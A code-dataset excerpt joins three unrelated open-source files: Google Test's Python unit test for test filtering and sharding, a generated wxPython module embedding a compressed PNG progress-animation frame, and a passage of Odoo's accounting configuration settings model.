# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test test filters.
A user can specify which test(s) in a Google Test program to run via either
the GTEST_FILTER environment variable or the --gtest_filter flag.
This script tests such functionality by invoking
gtest_filter_unittest_ (a program written with Google Test) with different
environments and command line flags.
Note that test sharding may also influence which tests are filtered. Therefore,
we test that here also.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import re
import sets
import tempfile
import unittest
import gtest_test_utils
# Constants.
# The environment variable for specifying the test filters.
FILTER_ENV_VAR = 'GTEST_FILTER'
# The environment variables for test sharding.
TOTAL_SHARDS_ENV_VAR = 'GTEST_TOTAL_SHARDS'
SHARD_INDEX_ENV_VAR = 'GTEST_SHARD_INDEX'
SHARD_STATUS_FILE_ENV_VAR = 'GTEST_SHARD_STATUS_FILE'
# The command line flag for specifying the test filters.
FILTER_FLAG = 'gtest_filter'
# The command line flag for including disabled tests.
ALSO_RUN_DISABED_TESTS_FLAG = 'gtest_also_run_disabled_tests'
# Command to run the gtest_filter_unittest_ program.
COMMAND = os.path.join(gtest_test_utils.GetBuildDir(),
'gtest_filter_unittest_')
# Regex for determining whether parameterized tests are enabled in the binary.
PARAM_TEST_REGEX = re.compile(r'/ParamTest')
# Regex for parsing test case names from Google Test's output.
TEST_CASE_REGEX = re.compile(r'^\[\-+\] \d+ tests? from (\w+(/\w+)?)')
# Regex for parsing test names from Google Test's output.
TEST_REGEX = re.compile(r'^\[\s*RUN\s*\].*\.(\w+(/\w+)?)')
# Full names of all tests in gtest_filter_unittests_.
PARAM_TESTS = [
'SeqP/ParamTest.TestX/0',
'SeqP/ParamTest.TestX/1',
'SeqP/ParamTest.TestY/0',
'SeqP/ParamTest.TestY/1',
'SeqQ/ParamTest.TestX/0',
'SeqQ/ParamTest.TestX/1',
'SeqQ/ParamTest.TestY/0',
'SeqQ/ParamTest.TestY/1',
]
DISABLED_TESTS = [
'BarTest.DISABLED_TestFour',
'BarTest.DISABLED_TestFive',
'BazTest.DISABLED_TestC',
'DISABLED_FoobarTest.Test1',
'DISABLED_FoobarTest.DISABLED_Test2',
'DISABLED_FoobarbazTest.TestA',
]
# All the non-disabled tests.
ACTIVE_TESTS = [
'FooTest.Abc',
'FooTest.Xyz',
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
'HasDeathTest.Test1',
'HasDeathTest.Test2',
] + PARAM_TESTS
param_tests_present = None
# Utilities.
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def Run(command):
"""Runs a Google Test program and returns a list of full names of the
tests that were run along with the test exit code.
"""
stdout_file = os.popen(command, 'r')
tests_run = []
test_case = ''
test = ''
for line in stdout_file:
match = TEST_CASE_REGEX.match(line)
if match is not None:
test_case = match.group(1)
else:
match = TEST_REGEX.match(line)
if match is not None:
test = match.group(1)
tests_run += [test_case + '.' + test]
exit_code = stdout_file.close()
return (tests_run, exit_code)
def InvokeWithModifiedEnv(extra_env, function, *args, **kwargs):
"""Runs the given function and arguments in a modified environment."""
try:
original_env = os.environ.copy()
os.environ.update(extra_env)
return function(*args, **kwargs)
finally:
for key in extra_env.iterkeys():
if key in original_env:
os.environ[key] = original_env[key]
else:
del os.environ[key]
def RunWithSharding(total_shards, shard_index, command):
"""Runs the Google Test program shard and returns a list of full names of the
tests that were run along with the exit code.
"""
extra_env = {SHARD_INDEX_ENV_VAR: str(shard_index),
TOTAL_SHARDS_ENV_VAR: str(total_shards)}
return InvokeWithModifiedEnv(extra_env, Run, command)
# The unit test.
class GTestFilterUnitTest(unittest.TestCase):
"""Tests using the GTEST_FILTER environment variable or the
--gtest_filter flag to filter tests.
"""
# Utilities.
def AssertSetEqual(self, lhs, rhs):
"""Asserts that two sets are equal."""
for elem in lhs:
self.assert_(elem in rhs, '%s in %s' % (elem, rhs))
for elem in rhs:
self.assert_(elem in lhs, '%s in %s' % (elem, lhs))
def AssertPartitionIsValid(self, set_var, list_of_sets):
"""Asserts that list_of_sets is a valid partition of set_var."""
full_partition = []
for slice_var in list_of_sets:
full_partition.extend(slice_var)
self.assertEqual(len(set_var), len(full_partition))
self.assertEqual(sets.Set(set_var), sets.Set(full_partition))
def RunAndVerify(self, gtest_filter, tests_to_run):
"""Runs gtest_flag_unittest_ with the given filter, and verifies
that the right set of tests were run.
"""
# Adjust tests_to_run in case value parameterized tests are disabled
# in the binary.
global param_tests_present
if not param_tests_present:
tests_to_run = list(sets.Set(tests_to_run) - sets.Set(PARAM_TESTS))
# First, tests using GTEST_FILTER.
SetEnvVar(FILTER_ENV_VAR, gtest_filter)
tests_run = Run(COMMAND)[0]
SetEnvVar(FILTER_ENV_VAR, None)
self.AssertSetEqual(tests_run, tests_to_run)
# Next, tests using --gtest_filter.
if gtest_filter is None:
command = COMMAND
else:
command = '%s --%s=%s' % (COMMAND, FILTER_FLAG, gtest_filter)
tests_run = Run(command)[0]
self.AssertSetEqual(tests_run, tests_to_run)
def RunAndVerifyWithSharding(self, gtest_filter, total_shards, tests_to_run,
command=COMMAND, check_exit_0=False):
"""Runs all shards of gtest_flag_unittest_ with the given filter, and
verifies that the right set of tests were run. The union of tests run
on each shard should be identical to tests_to_run, without duplicates.
If check_exit_0, make sure that all shards returned 0.
"""
SetEnvVar(FILTER_ENV_VAR, gtest_filter)
partition = []
for i in range(0, total_shards):
(tests_run, exit_code) = RunWithSharding(total_shards, i, command)
if check_exit_0:
self.assert_(exit_code is None)
partition.append(tests_run)
self.AssertPartitionIsValid(tests_to_run, partition)
SetEnvVar(FILTER_ENV_VAR, None)
def RunAndVerifyAllowingDisabled(self, gtest_filter, tests_to_run):
"""Runs gtest_flag_unittest_ with the given filter, and enables
disabled tests. Verifies that the right set of tests were run.
"""
# Construct the command line.
command = '%s --%s' % (COMMAND, ALSO_RUN_DISABED_TESTS_FLAG)
if gtest_filter is not None:
command = '%s --%s=%s' % (command, FILTER_FLAG, gtest_filter)
tests_run = Run(command)[0]
self.AssertSetEqual(tests_run, tests_to_run)
def setUp(self):
"""Sets up test case. Determines whether value-parameterized tests are
enabled in the binary and sets flags accordingly.
"""
global param_tests_present
if param_tests_present is None:
param_tests_present = PARAM_TEST_REGEX.search(
'\n'.join(os.popen(COMMAND, 'r').readlines())) is not None
def testDefaultBehavior(self):
"""Tests the behavior of not specifying the filter."""
self.RunAndVerify(None, ACTIVE_TESTS)
def testDefaultBehaviorWithShards(self):
"""Tests the behavior of not specifying the filter, with sharding
enabled.
"""
self.RunAndVerifyWithSharding(None, 1, ACTIVE_TESTS)
self.RunAndVerifyWithSharding(None, 2, ACTIVE_TESTS)
self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) - 1, ACTIVE_TESTS)
self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS), ACTIVE_TESTS)
self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) + 1, ACTIVE_TESTS)
def testEmptyFilter(self):
"""Tests an empty filter."""
self.RunAndVerify('', [])
self.RunAndVerifyWithSharding('', 1, [])
self.RunAndVerifyWithSharding('', 2, [])
def testBadFilter(self):
"""Tests a filter that matches nothing."""
self.RunAndVerify('BadFilter', [])
self.RunAndVerifyAllowingDisabled('BadFilter', [])
def testFullName(self):
"""Tests filtering by full name."""
self.RunAndVerify('FooTest.Xyz', ['FooTest.Xyz'])
self.RunAndVerifyAllowingDisabled('FooTest.Xyz', ['FooTest.Xyz'])
self.RunAndVerifyWithSharding('FooTest.Xyz', 5, ['FooTest.Xyz'])
def testUniversalFilters(self):
"""Tests filters that match everything."""
self.RunAndVerify('*', ACTIVE_TESTS)
self.RunAndVerify('*.*', ACTIVE_TESTS)
self.RunAndVerifyWithSharding('*.*', len(ACTIVE_TESTS) - 3, ACTIVE_TESTS)
self.RunAndVerifyAllowingDisabled('*', ACTIVE_TESTS + DISABLED_TESTS)
self.RunAndVerifyAllowingDisabled('*.*', ACTIVE_TESTS + DISABLED_TESTS)
def testFilterByTestCase(self):
"""Tests filtering by test case name."""
self.RunAndVerify('FooTest.*', ['FooTest.Abc', 'FooTest.Xyz'])
BAZ_TESTS = ['BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB']
self.RunAndVerify('BazTest.*', BAZ_TESTS)
self.RunAndVerifyAllowingDisabled('BazTest.*',
BAZ_TESTS + ['BazTest.DISABLED_TestC'])
def testFilterByTest(self):
"""Tests filtering by test name."""
self.RunAndVerify('*.TestOne', ['BarTest.TestOne', 'BazTest.TestOne'])
def testFilterDisabledTests(self):
"""Select only the disabled tests to run."""
self.RunAndVerify('DISABLED_FoobarTest.Test1', [])
self.RunAndVerifyAllowingDisabled('DISABLED_FoobarTest.Test1',
['DISABLED_FoobarTest.Test1'])
self.RunAndVerify('*DISABLED_*', [])
self.RunAndVerifyAllowingDisabled('*DISABLED_*', DISABLED_TESTS)
self.RunAndVerify('*.DISABLED_*', [])
self.RunAndVerifyAllowingDisabled('*.DISABLED_*', [
'BarTest.DISABLED_TestFour',
'BarTest.DISABLED_TestFive',
'BazTest.DISABLED_TestC',
'DISABLED_FoobarTest.DISABLED_Test2',
])
self.RunAndVerify('DISABLED_*', [])
self.RunAndVerifyAllowingDisabled('DISABLED_*', [
'DISABLED_FoobarTest.Test1',
'DISABLED_FoobarTest.DISABLED_Test2',
'DISABLED_FoobarbazTest.TestA',
])
def testWildcardInTestCaseName(self):
"""Tests using wildcard in the test case name."""
self.RunAndVerify('*a*.*', [
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
'HasDeathTest.Test1',
'HasDeathTest.Test2', ] + PARAM_TESTS)
def testWildcardInTestName(self):
"""Tests using wildcard in the test name."""
self.RunAndVerify('*.*A*', ['FooTest.Abc', 'BazTest.TestA'])
def testFilterWithoutDot(self):
"""Tests a filter that has no '.' in it."""
self.RunAndVerify('*z*', [
'FooTest.Xyz',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
])
def testTwoPatterns(self):
"""Tests filters that consist of two patterns."""
self.RunAndVerify('Foo*.*:*A*', [
'FooTest.Abc',
'FooTest.Xyz',
'BazTest.TestA',
])
# An empty pattern + a non-empty one
self.RunAndVerify(':*A*', ['FooTest.Abc', 'BazTest.TestA'])
def testThreePatterns(self):
"""Tests filters that consist of three patterns."""
self.RunAndVerify('*oo*:*A*:*One', [
'FooTest.Abc',
'FooTest.Xyz',
'BarTest.TestOne',
'BazTest.TestOne',
'BazTest.TestA',
])
# The 2nd pattern is empty.
self.RunAndVerify('*oo*::*One', [
'FooTest.Abc',
'FooTest.Xyz',
'BarTest.TestOne',
'BazTest.TestOne',
])
# The last 2 patterns are empty.
self.RunAndVerify('*oo*::', [
'FooTest.Abc',
'FooTest.Xyz',
])
def testNegativeFilters(self):
self.RunAndVerify('*-HasDeathTest.Test1', [
'FooTest.Abc',
'FooTest.Xyz',
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
'HasDeathTest.Test2',
] + PARAM_TESTS)
self.RunAndVerify('*-FooTest.Abc:HasDeathTest.*', [
'FooTest.Xyz',
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
] + PARAM_TESTS)
self.RunAndVerify('BarTest.*-BarTest.TestOne', [
'BarTest.TestTwo',
'BarTest.TestThree',
])
# Tests without leading '*'.
self.RunAndVerify('-FooTest.Abc:FooTest.Xyz:HasDeathTest.*', [
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
] + PARAM_TESTS)
# Value parameterized tests.
self.RunAndVerify('*/*', PARAM_TESTS)
# Value parameterized tests filtering by the sequence name.
self.RunAndVerify('SeqP/*', [
'SeqP/ParamTest.TestX/0',
'SeqP/ParamTest.TestX/1',
'SeqP/ParamTest.TestY/0',
'SeqP/ParamTest.TestY/1',
])
# Value parameterized tests filtering by the test name.
self.RunAndVerify('*/0', [
'SeqP/ParamTest.TestX/0',
'SeqP/ParamTest.TestY/0',
'SeqQ/ParamTest.TestX/0',
'SeqQ/ParamTest.TestY/0',
])
def testFlagOverridesEnvVar(self):
"""Tests that the --gtest_filter flag overrides the GTEST_FILTER
environment variable.
"""
SetEnvVar(FILTER_ENV_VAR, 'Foo*')
command = '%s --%s=%s' % (COMMAND, FILTER_FLAG, '*One')
tests_run = Run(command)[0]
SetEnvVar(FILTER_ENV_VAR, None)
self.AssertSetEqual(tests_run, ['BarTest.TestOne', 'BazTest.TestOne'])
def testShardStatusFileIsCreated(self):
"""Tests that the shard file is created if specified in the environment."""
test_tmpdir = tempfile.mkdtemp()
shard_status_file = os.path.join(test_tmpdir, 'shard_status_file')
self.assert_(not os.path.exists(shard_status_file))
extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file}
stdout_file = InvokeWithModifiedEnv(extra_env, os.popen, COMMAND, 'r')
try:
stdout_file.readlines()
finally:
stdout_file.close()
self.assert_(os.path.exists(shard_status_file))
os.remove(shard_status_file)
os.removedirs(test_tmpdir)
def testShardStatusFileIsCreatedWithListTests(self):
"""Tests that the shard file is created with --gtest_list_tests."""
test_tmpdir = tempfile.mkdtemp()
shard_status_file = os.path.join(test_tmpdir, 'shard_status_file2')
self.assert_(not os.path.exists(shard_status_file))
extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file}
stdout_file = InvokeWithModifiedEnv(extra_env, os.popen,
'%s --gtest_list_tests' % COMMAND, 'r')
try:
stdout_file.readlines()
finally:
stdout_file.close()
self.assert_(os.path.exists(shard_status_file))
os.remove(shard_status_file)
os.removedirs(test_tmpdir)
def testShardingWorksWithDeathTests(self):
"""Tests integration with death tests and sharding."""
gtest_filter = 'HasDeathTest.*:SeqP/*'
expected_tests = [
'HasDeathTest.Test1',
'HasDeathTest.Test2',
'SeqP/ParamTest.TestX/0',
'SeqP/ParamTest.TestX/1',
'SeqP/ParamTest.TestY/0',
'SeqP/ParamTest.TestY/1',
]
for command in (COMMAND + ' --gtest_death_test_style=threadsafe',
COMMAND + ' --gtest_death_test_style=fast'):
self.RunAndVerifyWithSharding(gtest_filter, 3, expected_tests,
check_exit_0=True, command=command)
self.RunAndVerifyWithSharding(gtest_filter, 5, expected_tests,
check_exit_0=True, command=command)
if __name__ == '__main__':
gtest_test_utils.Main()
| bsd-3-clause |
jorgb/airs | gui/images/anim/progress_1_04.py | 1 | 3301 | #----------------------------------------------------------------------
# This file was generated by D:\personal\src\airs\gui\images\anim\make_images.py
#
from wx import ImageFromStream, BitmapFromImage, EmptyIcon
import cStringIO, zlib
def getData():
return zlib.decompress(
'x\xda\x01\x9f\x03`\xfc\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00$\x00\
\x00\x00$\x08\x02\x00\x00\x00nb\x0f\xcf\x00\x00\x00\x03sBIT\x08\x08\x08\xdb\
\xe1O\xe0\x00\x00\x03WIDATH\x89\xa5\x97m\x93\x9b6\x14\x85\xcf\x95d\x8c]\xdaI\
\xb6\xc9L2\x93v\xf2\xff\xffT\xb2\xf9\xb0\xc9\xecn\x9b\x9d\xd6\xb1\x01K\xf7\
\xf4\x83\x00\x0b,X6\xbd\xc3\xd8\x06#=\xdc\x17\x9d+DU\xb1\xce<er\xc5\tW\x8e\
\xed\xee_\xc3\xf0\x8c\x93^O}\xc1\xaf\x01\xcb\x82g\xb5\xc2+\x00\x18\x81\x99z\
\x05\'W\x97\x9eC\xe6=\xf3\x94:,\x0e\xcb\x91\xe2\xc0\x05^\x06V+\xbcN\x07(3\
\xce\xbd\xd4\xcc5\xa9\x0e\xf0/K\xfcO\xc1")Z\xca\xbb\xf2s\xd6\x96sv\x81y\xca@\
\xcaZ\x8a\xec\xeb\xf3\x05\xa4\x11\xec\xba"\x16\x9c\x9b+\x90U\xb0c@\x9d\x0b\
\xd6\xfa\xe4\xcd\xb9\xf5\xf9\xa8_O]\xc4\xbajl\x15\x00\xc8\x00@\xc4NxN\x80\
\xc5\x82\xcc\x92\x1e[~\xfa\xa1M\xa03x[\x8a\x13:\xc4Z\xefs\x10`,C\x96\xe7\x0c\
\x9c\x0c\xcb\x88\xfd_\x19\xfe\xc1\xe3\xf6\xa8\xdf\xdbN.\xbc\xe2\xa1\xf6\xefw\
\xd6\x01\x97\n\x0c0\xf1\xd3\x01\x1c#K\x1b1S\x0f&>y\xca\x97c\xb8;MU\xe9[\x83\
\xf7;8O\xf1\x9c\xfe\xe7I\'\xd6\x93\x16*b+\xb7\xa4\x0b\x03\xe6\xa1\xf6\xb7\'\
\xfa\x9c\xfc\x9d\x02k\x85\xf3d6\x191\xb0\x01foV\x89\xec\x97c\xb8;\xcd\xde\
\xa6\xc4\xc9\x07\xa3\x84\x02\xca\xcb1\xb1b\x9dL\xdd\x14S1\x9a\xd8\x8f`\\\x9c\
=u=^1=ie\xd3\xaa\x9cl\xad4\xf3\xf2\xdd*\xcd\xdcJ\xd2\xf1\x13<kN\xb8]\xf4\xed\
\x14\xae\x84\xf8\xff[l~C\xec\x93\x1f\xcc\xf73\xaa\x02\x080-\x98\xb6\xe3\x05\
\xf3\x940.\xb4\x94\xa7\xc4\xd6\x88\x03\xe0\x15\x16\xdd\xec\xc3\x9d\xf1\xab\
\xd5g\xfa\xe1`u`\xa3\x1c\x00\xd9B3\xa5E\xc4dC\xea\xc9\xc3:}\xbc\xabC\n\x18\
\x829\x1c\x95\x13\xb3\xa0\xdfq\xa9=\x9d\xf5\xb8\xd8z\x00\xdc7\xfc\xbb\xe5\
\xc2\x1a1\x82\xd2\xc28\xa1\xbbr\xc9\x93i\xc7\xbao\xf4\xe0\x97H\xb7G\xb5"\xf1\
\xb8\xbeA\x89\xcaIi\xe0\x00TV\x1e\x83:\xe9\xb7l\xf13\x19vV\xdc\xd5\xe1W\x8b\
\xd7[;hq\xdc\x14\xdd7\xfaW;\x8a\xb3\x15\t\xe3\xd6\xaa\xc4\xef\x1b \xb6\x98\
\xd2\xca\x85\x14\xad\'\ri\x10\xc8\x93\xe7\x93W\'\xb0\x02\x00\x8d2\xeeVb\x03J\
3\x1b\xfd\x1b\x90[+o\nA\xac:\'\xac\x9c(\xd1\x89\xfa\x98\x145\x81\xa0\xed\'=x\
\x1e<\xcf\n+\x1d\t\xb8\xfcH\x91VD\x89\xb7[\xd9X\x83\xa1\xc4+\'\x85\x91tI\xa5\
\xa4h\xa1o]Vd\xe5\xb6.\x90\x95\x93\x0f\xbb\xaeU\x99\xfe\xb9xS\xc8\x10\xb4\
\xc9*a\xd2\xc6\x94\xddi\xe4\xd9\xe7\xa8\x7f\xee\xed\xb0L/\x85\xb8\xb7\xb8)L*\
\xfc\x8b{\xe2\x8cM"\x19\xc8\x8f\xbf\xd8W\x9b\xcb\x95Q\xd5\xbf\xda\xe0\xb7\
\x8d\x84q\x00\xa3\x1f!\xd7\xfe\xa3\xa5\xce\xb9>\x8b\x81\xfc\xb0\xb3\xef\xb6\
\xa3Q\x99\x17\x8b\xa73\x1e\x1a%(\x90\x08KI\xda\xd7Kz\x9a\xc6 \x96\xe5\x1f{3!\
\xe5a\x00\x0e\x1e\xf7\x8d6\n\xdb\x87{\xe0\r9\xcb\xc2<\xb1\xb3\xf8\xb8\xb7UN\
\xe1g_\x99<\xe5\xb1\xd5\x7f\xce\x1a\x88I\x95fa\x9e\xd8\x1a\xdc\x14\xe6]i\xe6\
\x84{\xe9\xfd,"\xff=\xfb\xefgi\xb4\xc3L\n5\x10V\xb01\xf2\xba\x907\xc5,f\x15l\
\xb0\xfe\xed&\xaa\x06\xa3|;\x83\xd2HiQ\xae\xeb\xc1\xff\x01~\xff\x10pu~\xc8#\
\x00\x00\x00\x00IEND\xaeB`\x82\xdbm\xc0z' )
def getBitmap():
return BitmapFromImage(getImage())
def getImage():
stream = cStringIO.StringIO(getData())
return ImageFromStream(stream)
| gpl-2.0 |
xujb/odoo | addons/account/res_config.py | 200 | 25453 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import datetime
from dateutil.relativedelta import relativedelta
import openerp
from openerp import SUPERUSER_ID
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DF
from openerp.tools.translate import _
from openerp.osv import fields, osv
class account_config_settings(osv.osv_memory):
_name = 'account.config.settings'
_inherit = 'res.config.settings'
_columns = {
'company_id': fields.many2one('res.company', 'Company', required=True),
'has_default_company': fields.boolean('Has default company', readonly=True),
'expects_chart_of_accounts': fields.related('company_id', 'expects_chart_of_accounts', type='boolean',
string='This company has its own chart of accounts',
help="""Check this box if this company is a legal entity."""),
'currency_id': fields.related('company_id', 'currency_id', type='many2one', relation='res.currency', required=True,
string='Default company currency', help="Main currency of the company."),
'paypal_account': fields.related('company_id', 'paypal_account', type='char', size=128,
string='Paypal account', help="Paypal account (email) for receiving online payments (credit card, etc.) If you set a paypal account, the customer will be able to pay your invoices or quotations with a button \"Pay with Paypal\" in automated emails or through the Odoo portal."),
'company_footer': fields.related('company_id', 'rml_footer', type='text', readonly=True,
string='Bank accounts footer preview', help="Bank accounts as printed in the footer of each printed document"),
'has_chart_of_accounts': fields.boolean('Company has a chart of accounts'),
'chart_template_id': fields.many2one('account.chart.template', 'Template', domain="[('visible','=', True)]"),
'code_digits': fields.integer('# of Digits', help="No. of digits to use for account code"),
'tax_calculation_rounding_method': fields.related('company_id',
'tax_calculation_rounding_method', type='selection', selection=[
('round_per_line', 'Round per line'),
('round_globally', 'Round globally'),
], string='Tax calculation rounding method',
help="If you select 'Round per line' : for each tax, the tax amount will first be computed and rounded for each PO/SO/invoice line and then these rounded amounts will be summed, leading to the total amount for that tax. If you select 'Round globally': for each tax, the tax amount will be computed for each PO/SO/invoice line, then these amounts will be summed and eventually this total tax amount will be rounded. If you sell with tax included, you should choose 'Round per line' because you certainly want the sum of your tax-included line subtotals to be equal to the total amount with taxes."),
'sale_tax': fields.many2one("account.tax.template", "Default sale tax"),
'purchase_tax': fields.many2one("account.tax.template", "Default purchase tax"),
'sale_tax_rate': fields.float('Sales tax (%)'),
'purchase_tax_rate': fields.float('Purchase tax (%)'),
'complete_tax_set': fields.boolean('Complete set of taxes', help='This boolean helps you to choose if you want to propose to the user to encode the sales and purchase rates or use the usual m2o fields. This last choice assumes that the set of tax defined for the chosen template is complete'),
'has_fiscal_year': fields.boolean('Company has a fiscal year'),
'date_start': fields.date('Start date', required=True),
'date_stop': fields.date('End date', required=True),
'period': fields.selection([('month', 'Monthly'), ('3months','3 Monthly')], 'Periods', required=True),
'sale_journal_id': fields.many2one('account.journal', 'Sale journal'),
'sale_sequence_prefix': fields.related('sale_journal_id', 'sequence_id', 'prefix', type='char', string='Invoice sequence'),
'sale_sequence_next': fields.related('sale_journal_id', 'sequence_id', 'number_next', type='integer', string='Next invoice number'),
'sale_refund_journal_id': fields.many2one('account.journal', 'Sale refund journal'),
'sale_refund_sequence_prefix': fields.related('sale_refund_journal_id', 'sequence_id', 'prefix', type='char', string='Credit note sequence'),
'sale_refund_sequence_next': fields.related('sale_refund_journal_id', 'sequence_id', 'number_next', type='integer', string='Next credit note number'),
'purchase_journal_id': fields.many2one('account.journal', 'Purchase journal'),
'purchase_sequence_prefix': fields.related('purchase_journal_id', 'sequence_id', 'prefix', type='char', string='Supplier invoice sequence'),
'purchase_sequence_next': fields.related('purchase_journal_id', 'sequence_id', 'number_next', type='integer', string='Next supplier invoice number'),
'purchase_refund_journal_id': fields.many2one('account.journal', 'Purchase refund journal'),
'purchase_refund_sequence_prefix': fields.related('purchase_refund_journal_id', 'sequence_id', 'prefix', type='char', string='Supplier credit note sequence'),
'purchase_refund_sequence_next': fields.related('purchase_refund_journal_id', 'sequence_id', 'number_next', type='integer', string='Next supplier credit note number'),
'module_account_check_writing': fields.boolean('Pay your suppliers by check',
help='This allows you to check writing and printing.\n'
'-This installs the module account_check_writing.'),
'module_account_accountant': fields.boolean('Full accounting features: journals, legal statements, chart of accounts, etc.',
help="""If you do not check this box, you will be able to do invoicing & payments, but not accounting (Journal Items, Chart of Accounts, ...)"""),
'module_account_asset': fields.boolean('Assets management',
help='This allows you to manage the assets owned by a company or a person.\n'
'It keeps track of the depreciation occurred on those assets, and creates account move for those depreciation lines.\n'
'-This installs the module account_asset. If you do not check this box, you will be able to do invoicing & payments, '
'but not accounting (Journal Items, Chart of Accounts, ...)'),
'module_account_budget': fields.boolean('Budget management',
help='This allows accountants to manage analytic and crossovered budgets. '
'Once the master budgets and the budgets are defined, '
'the project managers can set the planned amount on each analytic account.\n'
'-This installs the module account_budget.'),
'module_account_payment': fields.boolean('Manage payment orders',
help='This allows you to create and manage your payment orders, with purposes to \n'
'* serve as base for an easy plug-in of various automated payment mechanisms, and \n'
'* provide a more efficient way to manage invoice payments.\n'
'-This installs the module account_payment.' ),
'module_account_voucher': fields.boolean('Manage customer payments',
help='This includes all the basic requirements of voucher entries for bank, cash, sales, purchase, expense, contra, etc.\n'
'-This installs the module account_voucher.'),
'module_account_followup': fields.boolean('Manage customer payment follow-ups',
help='This allows to automate letters for unpaid invoices, with multi-level recalls.\n'
'-This installs the module account_followup.'),
'module_product_email_template': fields.boolean('Send products tools and information at the invoice confirmation',
help='With this module, link your products to a template to send complete information and tools to your customer.\n'
'For instance when invoicing a training, the training agenda and materials will automatically be send to your customers.'),
'group_proforma_invoices': fields.boolean('Allow pro-forma invoices',
implied_group='account.group_proforma_invoices',
help="Allows you to put invoices in pro-forma state."),
'default_sale_tax': fields.many2one('account.tax', 'Default sale tax',
help="This sale tax will be assigned by default on new products."),
'default_purchase_tax': fields.many2one('account.tax', 'Default purchase tax',
help="This purchase tax will be assigned by default on new products."),
'decimal_precision': fields.integer('Decimal precision on journal entries',
help="""As an example, a decimal precision of 2 will allow journal entries like: 9.99 EUR, whereas a decimal precision of 4 will allow journal entries like: 0.0231 EUR."""),
'group_multi_currency': fields.boolean('Allow multi currencies',
implied_group='base.group_multi_currency',
help="Allows you multi currency environment"),
'group_analytic_accounting': fields.boolean('Analytic accounting',
implied_group='analytic.group_analytic_accounting',
help="Allows you to use the analytic accounting."),
'group_check_supplier_invoice_total': fields.boolean('Check the total of supplier invoices',
implied_group="account.group_supplier_inv_check_total"),
'income_currency_exchange_account_id': fields.related(
'company_id', 'income_currency_exchange_account_id',
type='many2one',
relation='account.account',
string="Gain Exchange Rate Account",
domain="[('type', '=', 'other'), ('company_id', '=', company_id)]]"),
'expense_currency_exchange_account_id': fields.related(
'company_id', 'expense_currency_exchange_account_id',
type="many2one",
relation='account.account',
string="Loss Exchange Rate Account",
domain="[('type', '=', 'other'), ('company_id', '=', company_id)]]"),
}
def _check_account_gain(self, cr, uid, ids, context=None):
for obj in self.browse(cr, uid, ids, context=context):
if obj.income_currency_exchange_account_id.company_id and obj.company_id != obj.income_currency_exchange_account_id.company_id:
return False
return True
def _check_account_loss(self, cr, uid, ids, context=None):
for obj in self.browse(cr, uid, ids, context=context):
if obj.expense_currency_exchange_account_id.company_id and obj.company_id != obj.expense_currency_exchange_account_id.company_id:
return False
return True
_constraints = [
(_check_account_gain, 'The company of the gain exchange rate account must be the same than the company selected.', ['income_currency_exchange_account_id']),
(_check_account_loss, 'The company of the loss exchange rate account must be the same than the company selected.', ['expense_currency_exchange_account_id']),
]
def _default_company(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
return user.company_id.id
def _default_has_default_company(self, cr, uid, context=None):
count = self.pool.get('res.company').search_count(cr, uid, [], context=context)
return bool(count == 1)
def _get_default_fiscalyear_data(self, cr, uid, company_id, context=None):
"""Compute default period, starting and ending date for fiscalyear
- if in a fiscal year, use its period, starting and ending date
- if past fiscal year, use its period, and new dates [ending date of the latest +1 day ; ending date of the latest +1 year]
- if no fiscal year, use monthly, 1st jan, 31th dec of this year
:return: (date_start, date_stop, period) at format DEFAULT_SERVER_DATETIME_FORMAT
"""
fiscalyear_ids = self.pool.get('account.fiscalyear').search(cr, uid,
[('date_start', '<=', time.strftime(DF)), ('date_stop', '>=', time.strftime(DF)),
('company_id', '=', company_id)])
if fiscalyear_ids:
# is in a current fiscal year, use this one
fiscalyear = self.pool.get('account.fiscalyear').browse(cr, uid, fiscalyear_ids[0], context=context)
